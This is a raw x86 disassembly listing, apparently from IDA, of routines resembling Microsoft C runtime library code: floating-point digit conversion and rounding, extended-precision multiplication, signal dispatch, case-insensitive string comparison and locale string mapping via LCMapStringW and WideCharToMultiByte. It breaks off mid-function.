lea eax, [ebp+var_18]
push eax
call sub_41E828
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_18]
push eax
call sub_41E7CA
lea eax, [ebp+var_18]
push eax
call sub_41E828
mov al, byte ptr [ebp+var_E+1]
mov ecx, [ebp+arg_8]
and byte ptr [ebp+var_E+1], 0
add al, 30h
add esp, 14h
inc [ebp+arg_8]
dec [ebp+var_C]
mov [ecx], al
jnz short loc_41EF7B
mov eax, [ebp+arg_8]
loc_41EFC8: ; CODE XREF: sub_41EDA1+1D5�j
dec eax
mov cl, [eax]
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_41F015
jmp short loc_41EFDF
; ---------------------------------------------------------------------------
loc_41EFD6: ; CODE XREF: sub_41EDA1+240�j
cmp byte ptr [eax], 39h
jnz short loc_41EFE3
mov byte ptr [eax], 30h
dec eax
loc_41EFDF: ; CODE XREF: sub_41EDA1+233�j
cmp eax, ecx
jnb short loc_41EFD6
loc_41EFE3: ; CODE XREF: sub_41EDA1+238�j
cmp eax, ecx
jnb short loc_41EFEB
inc eax
inc word ptr [ebx]
loc_41EFEB: ; CODE XREF: sub_41EDA1+244�j
inc byte ptr [eax]
loc_41EFED: ; CODE XREF: sub_41EDA1+27A�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_41EFFC: ; CODE XREF: sub_41EDA1+EA�j
mov eax, [ebp+var_8]
loc_41EFFF: ; CODE XREF: sub_41EDA1+292�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41A1F6
leave
retn
; ---------------------------------------------------------------------------
loc_41F00F: ; CODE XREF: sub_41EDA1+276�j
cmp byte ptr [eax], 30h
jnz short loc_41F019
dec eax
loc_41F015: ; CODE XREF: sub_41EDA1+231�j
cmp eax, ecx
jnb short loc_41F00F
loc_41F019: ; CODE XREF: sub_41EDA1+271�j
cmp eax, ecx
jnb short loc_41EFED
mov byte ptr [ecx], 30h
loc_41F020: ; CODE XREF: sub_41EDA1+17D�j
and word ptr [ebx], 0
and byte ptr [ebx+5], 0
xor eax, eax
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
inc eax
jmp short loc_41EFFF
sub_41EDA1 endp
; =============== S U B R O U T I N E =======================================
sub_41F035 proc near ; CODE XREF: sub_41F063+72�p
mov ecx, dword_42E0CC
mov eax, edx
push edi
loc_41F03E: ; CODE XREF: sub_41F035+19�j
cmp [eax+4], esi
jz short loc_41F050
lea edi, [ecx+ecx*2]
add eax, 0Ch
lea edi, [edx+edi*4]
cmp eax, edi
jb short loc_41F03E
loc_41F050: ; CODE XREF: sub_41F035+C�j
lea ecx, [ecx+ecx*2]
lea ecx, [edx+ecx*4]
cmp eax, ecx
pop edi
jnb short loc_41F060
cmp [eax+4], esi
jz short locret_41F062
loc_41F060: ; CODE XREF: sub_41F035+24�j
xor eax, eax
locret_41F062: ; CODE XREF: sub_41F035+29�j
retn
sub_41F035 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F063 proc near ; CODE XREF: sub_41AA6F+395F�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041F1AB SIZE 00000031 BYTES
push 20h
push offset stru_429D70
call __SEH_prolog
xor ecx, ecx
mov [ebp+var_1C], ecx
mov eax, [ebp+arg_0]
dec eax
dec eax
jz short loc_41F0E5
dec eax
dec eax
jz short loc_41F0C5
sub eax, 4
jz short loc_41F0C5
sub eax, 3
jz short loc_41F0C5
sub eax, 4
jz short loc_41F0B8
sub eax, 6
jz short loc_41F0AB
dec eax
jz short loc_41F09E
or eax, 0FFFFFFFFh
jmp loc_41F1D6
; ---------------------------------------------------------------------------
loc_41F09E: ; CODE XREF: sub_41F063+31�j
mov esi, offset dword_47C5EC
mov edi, dword_47C5EC
jmp short loc_41F0F0
; ---------------------------------------------------------------------------
loc_41F0AB: ; CODE XREF: sub_41F063+2E�j
mov esi, offset dword_47C5E8
mov edi, dword_47C5E8
jmp short loc_41F0F0
; ---------------------------------------------------------------------------
loc_41F0B8: ; CODE XREF: sub_41F063+29�j
mov esi, offset dword_47C5F0
mov edi, dword_47C5F0
jmp short loc_41F0F0
; ---------------------------------------------------------------------------
loc_41F0C5: ; CODE XREF: sub_41F063+1A�j
; sub_41F063+1F�j ...
call sub_416E15
mov ebx, eax
mov [ebp+var_24], ebx
mov edx, [ebx+54h]
mov esi, [ebp+arg_0]
call sub_41F035
mov esi, eax
add esi, 8
mov edi, [esi]
xor ecx, ecx
jmp short loc_41F0FA
; ---------------------------------------------------------------------------
loc_41F0E5: ; CODE XREF: sub_41F063+16�j
mov esi, offset dword_47C5E4
mov edi, dword_47C5E4
loc_41F0F0: ; CODE XREF: sub_41F063+46�j
; sub_41F063+53�j ...
mov [ebp+var_1C], 1
mov ebx, [ebp+var_24]
loc_41F0FA: ; CODE XREF: sub_41F063+80�j
mov [ebp+var_20], edi
cmp edi, 1
jz loc_41F1D4
cmp edi, ecx
jnz short loc_41F111
push 3
call sub_4160A4
loc_41F111: ; CODE XREF: sub_41F063+A5�j
cmp [ebp+var_1C], ecx
jz short loc_41F11F
push ecx
call sub_418285
pop ecx
xor ecx, ecx
loc_41F11F: ; CODE XREF: sub_41F063+B1�j
mov [ebp+ms_exc.disabled], ecx
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_41F134
cmp eax, 0Bh
jz short loc_41F134
cmp eax, 4
jnz short loc_41F14F
loc_41F134: ; CODE XREF: sub_41F063+C5�j
; sub_41F063+CA�j
mov edx, [ebx+58h]
mov [ebp+var_28], edx
mov [ebx+58h], ecx
cmp eax, 8
jnz short loc_41F17B
mov edx, [ebx+5Ch]
mov [ebp+var_2C], edx
mov dword ptr [ebx+5Ch], 8Ch
loc_41F14F: ; CODE XREF: sub_41F063+CF�j
cmp eax, 8
jnz short loc_41F17B
mov eax, dword_42E0C0
loc_41F159: ; CODE XREF: sub_41F063+116�j
mov [ebp+var_30], eax
mov edx, dword_42E0C4
mov esi, dword_42E0C0
add edx, esi
cmp eax, edx
jge short loc_41F17D
lea edx, [eax+eax*2]
mov esi, [ebx+54h]
mov [esi+edx*4+8], ecx
inc eax
jmp short loc_41F159
; ---------------------------------------------------------------------------
loc_41F17B: ; CODE XREF: sub_41F063+DD�j
; sub_41F063+EF�j
mov [esi], ecx
loc_41F17D: ; CODE XREF: sub_41F063+109�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41F19E
cmp [ebp+arg_0], 8
jnz short loc_41F1AB
push dword ptr [ebx+5Ch]
push 8
call edi
pop ecx
jmp short loc_41F1B0
sub_41F063 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41F196 proc near ; DATA XREF: .rdata:stru_429D70�o
mov edi, [ebp-20h]
mov ebx, [ebp-24h]
xor ecx, ecx
sub_41F196 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41F19E proc near ; CODE XREF: sub_41F063+11E�p
cmp [ebp-1Ch], ecx
jz short locret_41F1AA
push ecx
call sub_4181F1
pop ecx
locret_41F1AA: ; CODE XREF: sub_41F19E+3�j
retn
sub_41F19E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41F063
loc_41F1AB: ; CODE XREF: sub_41F063+127�j
push [ebp+arg_0]
call edi
loc_41F1B0: ; CODE XREF: sub_41F063+131�j
pop ecx
mov eax, [ebp+arg_0]
cmp eax, 8
jz short loc_41F1C3
cmp eax, 0Bh
jz short loc_41F1C3
cmp eax, 4
jnz short loc_41F1D4
loc_41F1C3: ; CODE XREF: sub_41F063+154�j
; sub_41F063+159�j
mov ecx, [ebp+var_28]
mov [ebx+58h], ecx
cmp eax, 8
jnz short loc_41F1D4
mov eax, [ebp+var_2C]
mov [ebx+5Ch], eax
loc_41F1D4: ; CODE XREF: sub_41F063+9D�j
; sub_41F063+15E�j ...
xor eax, eax
loc_41F1D6: ; CODE XREF: sub_41F063+36�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41F063
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+10h]
or ecx, ecx
jz short loc_41F23A
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_41F1FC: ; CODE XREF: .text:0041F229�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_41F22B
or al, al
jz short loc_41F22B
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_41F218
cmp ah, bl
ja short loc_41F218
add ah, dh
loc_41F218: ; CODE XREF: .text:0041F210�j
; .text:0041F214�j
cmp al, bh
jb short loc_41F222
cmp al, bl
ja short loc_41F222
add al, dh
loc_41F222: ; CODE XREF: .text:0041F21A�j
; .text:0041F21E�j
cmp ah, al
jnz short loc_41F231
sub ecx, 1
jnz short loc_41F1FC
loc_41F22B: ; CODE XREF: .text:0041F202�j
; .text:0041F206�j
xor ecx, ecx
cmp ah, al
jz short loc_41F23A
loc_41F231: ; CODE XREF: .text:0041F224�j
mov ecx, 0FFFFFFFFh
jb short loc_41F23A
neg ecx
loc_41F23A: ; CODE XREF: .text:0041F1EB�j
; .text:0041F22F�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_41F241 proc near ; CODE XREF: sub_41E66E+73�p
; sub_41E66E+C4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47C620[ecx*4]
lea eax, [eax+eax*8]
lea edx, [ecx+eax*4+4]
mov cl, [edx]
xor eax, eax
mov al, cl
push esi
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_41F277
and cl, 7Fh
jmp short loc_41F284
; ---------------------------------------------------------------------------
loc_41F277: ; CODE XREF: sub_41F241+2F�j
cmp [esp+4+arg_4], 4000h
jnz short loc_41F293
or cl, 80h
loc_41F284: ; CODE XREF: sub_41F241+34�j
neg eax
sbb eax, eax
and eax, 0FFFFC000h
add eax, esi
mov [edx], cl
pop esi
retn
; ---------------------------------------------------------------------------
loc_41F293: ; CODE XREF: sub_41F241+3E�j
call sub_419600
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
pop esi
retn
sub_41F241 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F2A3 proc near ; CODE XREF: sub_41EDA1+15D�p
; sub_41F4DB+6E�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_42DEA8
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+var_4], eax
xor eax, eax
xor ecx, ecx
mov cx, [ebx+0Ah]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_18], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov ax, [esi+0Ah]
push edi
mov edi, ecx
mov edx, 7FFFh
and ecx, edx
xor edi, eax
and eax, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_41F4B0
cmp cx, 7FFFh
jnb loc_41F4B0
cmp dx, 0BFFDh
ja loc_41F4B0
cmp dx, 3FBFh
ja short loc_41F319
xor eax, eax
jmp short loc_41F353
; ---------------------------------------------------------------------------
loc_41F319: ; CODE XREF: sub_41F2A3+70�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_41F33B
inc [ebp+arg_0]
xor eax, eax
test [esi+8], edx
jnz short loc_41F33D
cmp [esi+4], eax
jnz short loc_41F33D
cmp [esi], eax
jnz short loc_41F33D
jmp loc_41F4AA
; ---------------------------------------------------------------------------
loc_41F33B: ; CODE XREF: sub_41F2A3+7E�j
xor eax, eax
loc_41F33D: ; CODE XREF: sub_41F2A3+88�j
; sub_41F2A3+8D�j ...
cmp cx, ax
jnz short loc_41F360
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_41F360
cmp [ebx+4], eax
jnz short loc_41F360
cmp [ebx], eax
jnz short loc_41F360
loc_41F353: ; CODE XREF: sub_41F2A3+74�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_41F4CB
; ---------------------------------------------------------------------------
loc_41F360: ; CODE XREF: sub_41F2A3+9D�j
; sub_41F2A3+A5�j ...
mov [ebp+var_14], eax
lea eax, [ebp+var_24]
mov [ebp+var_8], eax
mov [ebp+arg_4], 5
loc_41F370: ; CODE XREF: sub_41F2A3+12F�j
mov eax, [ebp+var_14]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_41F3C4
add eax, esi
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [ebx+8]
mov [ebp+var_10], ecx
mov [ebp+var_1C], eax
loc_41F38C: ; CODE XREF: sub_41F2A3+11F�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
movzx ecx, word ptr [ecx]
movzx eax, word ptr [eax]
imul eax, ecx
mov ecx, [ebp+var_8]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_41E7A9
add esp, 0Ch
test eax, eax
jz short loc_41F3B7
mov eax, [ebp+var_8]
inc word ptr [eax]
loc_41F3B7: ; CODE XREF: sub_41F2A3+10C�j
add [ebp+var_C], 2
sub [ebp+var_10], 2
dec [ebp+var_1C]
jnz short loc_41F38C
loc_41F3C4: ; CODE XREF: sub_41F2A3+D6�j
add [ebp+var_8], 2
inc [ebp+var_14]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_41F370
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_41F407
loc_41F3E2: ; CODE XREF: sub_41F2A3+15B�j
test byte ptr [ebp+var_20+3], 80h
jnz short loc_41F400
lea eax, [ebp+var_28]
push eax
call sub_41E828
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
pop ecx
jg short loc_41F3E2
loc_41F400: ; CODE XREF: sub_41F2A3+143�j
cmp word ptr [ebp+arg_0], 0
jg short loc_41F440
loc_41F407: ; CODE XREF: sub_41F2A3+13D�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_41F440
mov eax, [ebp+arg_0]
neg eax
movzx ebx, ax
add [ebp+arg_0], ebx
loc_41F420: ; CODE XREF: sub_41F2A3+191�j
test byte ptr [ebp+var_28], 1
jz short loc_41F429
inc [ebp+var_18]
loc_41F429: ; CODE XREF: sub_41F2A3+181�j
lea eax, [ebp+var_28]
push eax
call sub_41E856
dec ebx
pop ecx
jnz short loc_41F420
cmp [ebp+var_18], 0
jz short loc_41F440
or byte ptr [ebp+var_28], 1
loc_41F440: ; CODE XREF: sub_41F2A3+162�j
; sub_41F2A3+170�j ...
cmp word ptr [ebp+var_28], 8000h
ja short loc_41F457
mov eax, [ebp+var_28]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_41F48C
loc_41F457: ; CODE XREF: sub_41F2A3+1A3�j
cmp [ebp+var_28+2], 0FFFFFFFFh
jnz short loc_41F489
and [ebp+var_28+2], 0
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_41F484
and [ebp+var_24+2], 0
cmp word ptr [ebp+var_20+2], 0FFFFh
jnz short loc_41F47E
inc [ebp+arg_0]
mov word ptr [ebp+var_20+2], 8000h
jmp short loc_41F48C
; ---------------------------------------------------------------------------
loc_41F47E: ; CODE XREF: sub_41F2A3+1CE�j
inc word ptr [ebp+var_20+2]
jmp short loc_41F48C
; ---------------------------------------------------------------------------
loc_41F484: ; CODE XREF: sub_41F2A3+1C2�j
inc [ebp+var_24+2]
jmp short loc_41F48C
; ---------------------------------------------------------------------------
loc_41F489: ; CODE XREF: sub_41F2A3+1B8�j
inc [ebp+var_28+2]
loc_41F48C: ; CODE XREF: sub_41F2A3+1B2�j
; sub_41F2A3+1D9�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_41F4B0
mov cx, word ptr [ebp+var_28+2]
mov [esi], cx
mov ecx, [ebp+var_24]
mov [esi+2], ecx
mov ecx, [ebp+var_20]
mov [esi+6], ecx
or eax, edi
loc_41F4AA: ; CODE XREF: sub_41F2A3+93�j
mov [esi+0Ah], ax
jmp short loc_41F4CB
; ---------------------------------------------------------------------------
loc_41F4B0: ; CODE XREF: sub_41F2A3+4F�j
; sub_41F2A3+5A�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_41F4CB: ; CODE XREF: sub_41F2A3+B8�j
; sub_41F2A3+20B�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41A1F6
leave
retn
sub_41F2A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F4DB proc near ; CODE XREF: sub_41E967+39F�p
; sub_41EDA1+144�p
var_10 = byte ptr -10h
var_E = dword ptr -0Eh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_42DEA8
xor eax, [ebp+4]
push ebx
mov ebx, offset dword_42E360
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
mov [ebp+var_4], eax
jz short loc_41F559
jge short loc_41F509
neg [ebp+arg_4]
mov ebx, offset dword_42E4C0
sub ebx, 60h
loc_41F509: ; CODE XREF: sub_41F4DB+21�j
cmp [ebp+arg_8], ecx
jnz short loc_41F514
mov eax, [ebp+arg_0]
mov [eax], cx
loc_41F514: ; CODE XREF: sub_41F4DB+31�j
cmp [ebp+arg_4], ecx
jz short loc_41F559
push esi
push edi
loc_41F51B: ; CODE XREF: sub_41F4DB+7A�j
mov eax, [ebp+arg_4]
sar [ebp+arg_4], 3
and eax, 7
add ebx, 54h
cmp eax, ecx
jz short loc_41F552
lea eax, [eax+eax*2]
lea esi, [ebx+eax*4]
cmp word ptr [esi], 8000h
jb short loc_41F545
lea edi, [ebp+var_10]
movsd
movsd
movsd
dec [ebp+var_E]
lea esi, [ebp+var_10]
loc_41F545: ; CODE XREF: sub_41F4DB+5C�j
push esi
push [ebp+arg_0]
call sub_41F2A3
pop ecx
pop ecx
xor ecx, ecx
loc_41F552: ; CODE XREF: sub_41F4DB+4F�j
cmp [ebp+arg_4], ecx
jnz short loc_41F51B
pop edi
pop esi
loc_41F559: ; CODE XREF: sub_41F4DB+1F�j
; sub_41F4DB+3C�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop ebx
call sub_41A1F6
leave
retn
sub_41F4DB endp
; =============== S U B R O U T I N E =======================================
sub_41F567 proc near ; CODE XREF: sub_40668C+31�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_41F58E
push esi
call sub_4179C0
inc eax
push eax
call sub_414E7D
test eax, eax
pop ecx
pop ecx
jz short loc_41F58E
push esi
push eax
call sub_419C40
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41F58E: ; CODE XREF: sub_41F567+7�j
; sub_41F567+1A�j
xor eax, eax
pop esi
retn
sub_41F567 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41F5A0 proc near ; CODE XREF: sub_403C3B+14A�p
jmp ds:dword_4201F0
sub_41F5A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41F5A6 proc near ; CODE XREF: sub_415643+24�p
; sub_415970+13�p
jmp ds:dword_420160
sub_41F5A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F5AC proc near ; CODE XREF: sub_403374+DA�p
; sub_403374+F1�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
call sub_416E15
mov ecx, [eax+64h]
cmp ecx, off_42D83C
mov [ebp+var_4], ecx
jz short loc_41F5CD
call sub_417C4E
mov [ebp+var_4], eax
mov ecx, eax
loc_41F5CD: ; CODE XREF: sub_41F5AC+15�j
cmp dword ptr [ecx+14h], 0
push ebx
jnz short loc_41F612
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
loc_41F5DA: ; CODE XREF: sub_41F5AC+62�j
xor ebx, ebx
mov bx, [ecx]
cmp bx, 41h
jb short loc_41F5EE
cmp bx, 5Ah
ja short loc_41F5EE
add ebx, 20h
loc_41F5EE: ; CODE XREF: sub_41F5AC+37�j
; sub_41F5AC+3D�j
xor eax, eax
mov ax, [edx]
cmp ax, 41h
jb short loc_41F602
cmp ax, 5Ah
ja short loc_41F602
add eax, 20h
loc_41F602: ; CODE XREF: sub_41F5AC+4B�j
; sub_41F5AC+51�j
inc ecx
inc ecx
inc edx
inc edx
test bx, bx
jz short loc_41F64E
cmp bx, ax
jz short loc_41F5DA
jmp short loc_41F64E
; ---------------------------------------------------------------------------
loc_41F612: ; CODE XREF: sub_41F5AC+26�j
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
jmp short loc_41F61F
; ---------------------------------------------------------------------------
loc_41F61C: ; CODE XREF: sub_41F5AC+9E�j
mov ecx, [ebp+var_4]
loc_41F61F: ; CODE XREF: sub_41F5AC+6E�j
xor eax, eax
mov ax, [esi]
push eax
push ecx
call sub_41F659
inc esi
inc esi
mov ebx, eax
xor eax, eax
mov ax, [edi]
push eax
push [ebp+var_4]
call sub_41F659
add esp, 10h
inc edi
inc edi
test bx, bx
jz short loc_41F64C
cmp bx, ax
jz short loc_41F61C
loc_41F64C: ; CODE XREF: sub_41F5AC+99�j
pop edi
pop esi
loc_41F64E: ; CODE XREF: sub_41F5AC+5D�j
; sub_41F5AC+64�j
movzx ecx, ax
movzx eax, bx
sub eax, ecx
pop ebx
leave
retn
sub_41F5AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F659 proc near ; CODE XREF: sub_41F5AC+7A�p
; sub_41F5AC+8C�p
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, 0FFFFh
cmp word ptr [ebp+arg_4], ax
jz short locret_41F6B8
cmp word ptr [ebp+arg_4], 100h
push esi
mov esi, [ebp+arg_0]
jnb short loc_41F68C
push 1
push [ebp+arg_4]
push esi
call sub_41F913
add esp, 0Ch
test eax, eax
jnz short loc_41F68C
mov ax, word ptr [ebp+arg_4]
jmp short loc_41F6B7
; ---------------------------------------------------------------------------
loc_41F68C: ; CODE XREF: sub_41F659+19�j
; sub_41F659+2B�j
push dword ptr [esi+4]
lea eax, [ebp+var_4]
push 1
push eax
push 1
lea eax, [ebp+arg_4]
push eax
push 100h
push dword ptr [esi+14h]
call sub_41F6BA
add esp, 1Ch
test eax, eax
mov ax, word ptr [ebp+arg_4]
jz short loc_41F6B7
mov ax, [ebp+var_4]
loc_41F6B7: ; CODE XREF: sub_41F659+31�j
; sub_41F659+58�j
pop esi
locret_41F6B8: ; CODE XREF: sub_41F659+D�j
leave
retn
sub_41F659 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F6BA proc near ; CODE XREF: sub_41F659+4A�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 24h
push offset stru_429D80
call __SEH_prolog
xor ebx, ebx
xor edi, edi
inc edi
cmp dword_47C604, ebx
jnz short loc_41F708
push ebx
push ebx
push edi
push offset dword_4290B0
push 100h
push ebx
call ds:dword_4201A4 ; LCMapStringW
test eax, eax
jz short loc_41F6F3
mov dword_47C604, edi
jmp short loc_41F708
; ---------------------------------------------------------------------------
loc_41F6F3: ; CODE XREF: sub_41F6BA+2F�j
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41F708
mov dword_47C604, 2
loc_41F708: ; CODE XREF: sub_41F6BA+17�j
; sub_41F6BA+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_41F72A
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_41F713: ; CODE XREF: sub_41F6BA+63�j
dec ecx
cmp [eax], bx
jz short loc_41F722
inc eax
inc eax
cmp ecx, ebx
jnz short loc_41F713
or ecx, 0FFFFFFFFh
loc_41F722: ; CODE XREF: sub_41F6BA+5D�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_41F72A: ; CODE XREF: sub_41F6BA+51�j
mov eax, dword_47C604
cmp eax, edi
jnz short loc_41F750
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A4 ; LCMapStringW
jmp loc_41F90A
; ---------------------------------------------------------------------------
loc_41F750: ; CODE XREF: sub_41F6BA+77�j
cmp eax, 2
jz short loc_41F759
cmp eax, ebx
jnz short loc_41F7AD
loc_41F759: ; CODE XREF: sub_41F6BA+99�j
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_24], ebx
cmp [ebp+arg_0], ebx
jnz short loc_41F76F
mov eax, dword_47C4C0
mov [ebp+arg_0], eax
loc_41F76F: ; CODE XREF: sub_41F6BA+AB�j
cmp [ebp+arg_18], ebx
jnz short loc_41F77C
mov eax, dword_47C4D0
mov [ebp+arg_18], eax
loc_41F77C: ; CODE XREF: sub_41F6BA+B8�j
push [ebp+arg_0]
call sub_41DF57
pop ecx
cmp [ebp+arg_18], eax
jz short loc_41F792
cmp eax, 0FFFFFFFFh
jz short loc_41F792
mov [ebp+arg_18], eax
loc_41F792: ; CODE XREF: sub_41F6BA+CE�j
; sub_41F6BA+D3�j
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push [ebp+arg_18]
call ds:dword_4200D8 ; WideCharToMultiByte
mov [ebp+var_28], eax
cmp eax, ebx
jnz short loc_41F7B4
loc_41F7AD: ; CODE XREF: sub_41F6BA+9D�j
; sub_41F6BA+141�j
xor eax, eax
jmp loc_41F90A
; ---------------------------------------------------------------------------
loc_41F7B4: ; CODE XREF: sub_41F6BA+F1�j
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_414800
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41F7E8
; ---------------------------------------------------------------------------
loc_41F7D0: ; DATA XREF: .rdata:stru_429D80�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41F7D4: ; DATA XREF: .rdata:stru_429D80�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419D38
xor ebx, ebx
mov [ebp+var_2C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor edi, edi
inc edi
loc_41F7E8: ; CODE XREF: sub_41F6BA+114�j
cmp [ebp+var_2C], ebx
jnz short loc_41F800
push [ebp+var_28]
call sub_414E7D
pop ecx
mov [ebp+var_2C], eax
cmp eax, ebx
jz short loc_41F7AD
mov [ebp+var_20], edi
loc_41F800: ; CODE XREF: sub_41F6BA+131�j
push ebx
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push [ebp+arg_18]
call ds:dword_4200D8 ; WideCharToMultiByte
test eax, eax
jz loc_41F8EA
push ebx
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A0 ; LCMapStringA
mov esi, eax
mov [ebp+var_30], esi
cmp esi, ebx
jz loc_41F8EA
mov [ebp+ms_exc.disabled], edi
add eax, 3
and eax, 0FFFFFFFCh
call sub_414800
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_34], edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41F874
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_419D38
xor ebx, ebx
xor edi, edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_30]
loc_41F874: ; CODE XREF: sub_41F6BA+1A1�j
cmp edi, ebx
jnz short loc_41F88C
push esi
call sub_414E7D
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_41F8ED
mov [ebp+var_24], 1
loc_41F88C: ; CODE XREF: sub_41F6BA+1BC�j
push esi
push edi
push [ebp+var_28]
push [ebp+var_2C]
